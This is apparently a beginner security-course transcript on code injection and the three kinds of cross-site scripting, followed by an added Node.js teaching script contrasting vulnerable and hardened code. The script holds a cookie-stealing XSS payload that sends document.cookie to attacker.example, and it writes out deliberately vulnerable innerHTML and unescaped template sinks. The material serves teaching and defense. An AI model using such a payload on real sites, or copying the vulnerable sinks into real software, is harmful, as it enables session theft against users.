Code Injection and Cross Site Scripting


Time: 7 hours 50 minutes
Difficulty: Beginner
CEU/CPE: 8
Video Transcription
>> Let's start off by talking about code injection. It's exactly what it sounds like. An attacker injects code into a backend database through a website, usually through a form that is open to the public. We fill out forms all the time on the Internet, anytime you are buying something online or filling out a survey and so forth. Of course, what we enter into those forms gets dumped into a backend database. But the thing is, if I'm allowed to enter garbage and it gets processed on the backend database, it can actually run a command that is very harmful. You don't have to be a SQL engineer to know that the command in this cartoon, "drop table", is probably not going to be good for your database.

What do we do to mitigate this? Input validation. We make sure that what goes into our database meets our rules. We're going to validate things like datatype, so if the form is asking for a date-time, I'll make sure that the field only accepts that type of data. We restrict the field length to limit what a malicious actor can do. Or even better, we give you a drop-down menu to select from so you don't enter something in a field that can be damaging. That's all part of input validation. Now, input sanitization is comparable, but what it will do is attempt to clean up what is being entered. For example, let's say we allowed 12 characters for a last name field, but your last name is 14 characters. Maybe you enter all 14 characters, but data sanitization is going to truncate the last two characters so that your information is input as 12 characters. The answer to code injection is input validation and sanitization. Let me just tell you, that's the answer to a lot of issues. Well-written web applications make sure that the interface, or the scripting that pulls the entry from the user, ensures the data meets certain requirements.

There are utilities that perform what's referred to as fuzzing, which makes sure that the application has the proper input validation and sanitization. Now, some people will talk about running fuzzing tools to see if they can exploit weaknesses and vulnerabilities. It's just like anything else: anything that was developed for good can also be used for evil. However the context is presented on the exam, think about fuzzing as something that checks an application for weak input control.

Now, one of the problems that can come from poor input validation is cross-site scripting. Cross-site scripting is really a major vulnerability. It's been around for years and keeps showing up on the top 10 lists of the most common vulnerabilities. It's really something that we need to work on in software development. It's specifically geared towards web applications. We have three basic types of cross-site scripting: persistent, reflective, and DOM-based. DOM stands for Document Object Model.

The first type of cross-site scripting we'll look at is persistent. As an example of this type, let's say that before you took this class, you got to know which instructor you wanted to take this class from. Let's say each instructor gets to create their own biography for you to read so you can make your selection. When you click on an instructor's picture, it switches and loads the biography. But what if an instructor also injected a malicious script into the picture? When you clicked on the picture, the payload did something like capture your sensitive information from your system and send it to the attacker. You can see how that's persistent, because it'll be sitting there in the picture for whenever someone clicks on it. Now, just for the record, nothing like this exists in the picture for this course's instructor on the Cybrary site. This type of attack could be done in a lot of ways. I always think of dating websites and how quick people are to click on this image or that image, and all those files were uploaded by strangers. Who knows what can be in there? It's up to the site to ensure that it's coded to catch that type of thing and prevent it, and that the data that is going in is sanitized. But with social media, there are a million ways that we could become vulnerable to cross-site scripting.

Now, reflective cross-site scripting is non-persistent. This starts off with the attacker, who creates a URL that has some malicious string in it. The attacker sends that URL to the user somehow. The user clicks on that link thinking it's for a legitimate site, but ultimately it takes the user to a rogue website. Once the user clicks the malicious URL and goes to the site, it runs its payload on the user's system. It might be that this code causes some of that user's sensitive information to be sent back to the attacker based on the user's connection. This is non-persistent because it's based on this link that the attacker sent to the user.

Now, the last type of cross-site scripting is called DOM-based. That stands for Document Object Model-based. With this type, an attacker crafts a URL containing a malicious string and sends it to the victim. The victim is tricked into opening the link and requesting the malicious URL from the website. The website includes the malicious string in its response to the victim. The victim's browser interprets the malicious code in the server's response as part of the legitimate web page and executes the code. Then the victim's sensitive information is sent to the attacker's server. An example of this might be a case where I go to the website that the attacker has sent me and it asks me to fill in my name. I fill in "Kelly" and press Enter. Then I see a welcome screen that says, "Hello Kelly." It is taking my input and using my input to launch a second page. There's nothing happening on the web server that's been poisoned, so to speak. It's more about the fact that they've manipulated the code so that it modifies what the website returns when the user enters the input. I hope that makes sense. It's not that the website has been compromised, but they've tricked your system into providing input that is going to cause some malicious return on the web server's part. It's all happening in the victim's web browser. No modification at all to the web server, and that's what makes it DOM-based. It has nothing to do with the interaction of objects on the same system. Nothing is happening on the website. It's more that your system is being tricked into requesting some malicious activity.

Cross-site scripting can be really nasty. It usually includes some manipulation where you go to a website and get something malicious in return. The best defense from a web server perspective is to write clean applications that validate input and sanitize it. From a user's perspective, you can keep your browser up to date and disable JavaScript, except where it's absolutely necessary. Those are some things you can do to keep it safe.
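As an added example that is not part of the course transcript and not Cybrary's code: the Node.js script below shows the three cross-site scripting types described above as the code that makes each one possible, beside a hardened version of the same code, together with the truncating sanitization and allowlist validation the instructor describes and an HTML-encoding step at the point where user data is written into the page. The function names, the instructor key, the domains course.example and attacker.example, the 12-character name limit and the payload are all constructed for illustration.

```javascript
// Added example (not from the course or from Cybrary): the three XSS flavours
// from the transcript, each as the vulnerable sink next to a hardened form, plus
// the validation and truncation steps the transcript describes. Plain Node.js,
// no dependencies. All names, inputs and the payload are constructed for
// illustration; attacker.example and course.example are reserved test domains.

const MAX_NAME_LEN = 12; // the 12-character limit used in the transcript's example

// Sanitization as the transcript describes it: trim, then truncate to the limit.
function sanitizeName(name) {
  return String(name).trim().slice(0, MAX_NAME_LEN);
}

// Validation: allowlist of letters, spaces, hyphens and apostrophes, 1..12 chars.
function isValidName(name) {
  return new RegExp(`^[\\p{L} '-]{1,${MAX_NAME_LEN}}$`, 'u').test(name);
}

// Output encoding for text placed inside an HTML element body. Validation narrows
// the input; encoding is what actually stops the browser parsing it as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed attacker payload: an <img> whose error handler exfiltrates cookies.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Does a rendered fragment still carry a tag the browser would act on?
function containsActiveMarkup(html) {
  return /<\s*(img|script|svg|iframe)\b/i.test(html);
}

// --- Persistent (stored) XSS: the bio is written once and served to every visitor.
const bioStore = new Map();
function saveBio(instructor, bio) { bioStore.set(instructor, bio); }
function renderBioVulnerable(instructor) {
  return `<div class="bio">${bioStore.get(instructor) ?? ''}</div>`;
}
function renderBioSafe(instructor) {
  return `<div class="bio">${escapeHtml(bioStore.get(instructor) ?? '')}</div>`;
}

// --- Reflected XSS: a query parameter from one request is echoed into its response.
function greetVulnerable(requestUrl) {
  const name = new URL(requestUrl).searchParams.get('name') ?? '';
  return `<h1>Hello ${name}</h1>`;
}
function greetSafe(requestUrl) {
  const name = sanitizeName(new URL(requestUrl).searchParams.get('name') ?? '');
  if (!isValidName(name)) return '<h1>Hello guest</h1>'; // reject what fails validation
  return `<h1>Hello ${escapeHtml(name)}</h1>`;           // and still encode what passes
}

// --- DOM-based XSS: the server never sees the payload. A script in the page reads
// location.hash and writes it with innerHTML, which parses markup; textContent
// does not. A tiny stand-in element lets this run under Node.
function makeElement() { return { innerHTML: '', textContent: '' }; }
function domGreetVulnerable(hash, el = makeElement()) {
  el.innerHTML = 'Hello ' + decodeURIComponent(hash.replace(/^#/, ''));
  return el;
}
function domGreetSafe(hash, el = makeElement()) {
  el.textContent = 'Hello ' + decodeURIComponent(hash.replace(/^#/, ''));
  return el;
}

// Demonstration run.
saveBio('kelly', 'Teaches Security+. ' + PAYLOAD);
console.log('stored, vulnerable :', containsActiveMarkup(renderBioVulnerable('kelly')));
console.log('stored, safe       :', containsActiveMarkup(renderBioSafe('kelly')));
const link = 'https://course.example/hello?name=' + encodeURIComponent(PAYLOAD);
console.log('reflected, vuln    :', containsActiveMarkup(greetVulnerable(link)));
console.log('reflected, safe    :', greetSafe(link));
console.log('dom, vulnerable    :', domGreetVulnerable('#' + encodeURIComponent(PAYLOAD)).innerHTML);
```

Run it with node. The stored and reflected cases are server-side templating, so the fix is on the server: reject what fails validation and encode whatever is written into the response. The DOM-based case never sends the payload to the server, so server-side validation and encoding cannot see it; the fix there is choosing a sink such as textContent that does not parse markup. Encoding is needed even after validation: O'Brien passes the name allowlist, yet the apostrophe still has to be encoded so it cannot close a quoted attribute if the same value is later placed inside one.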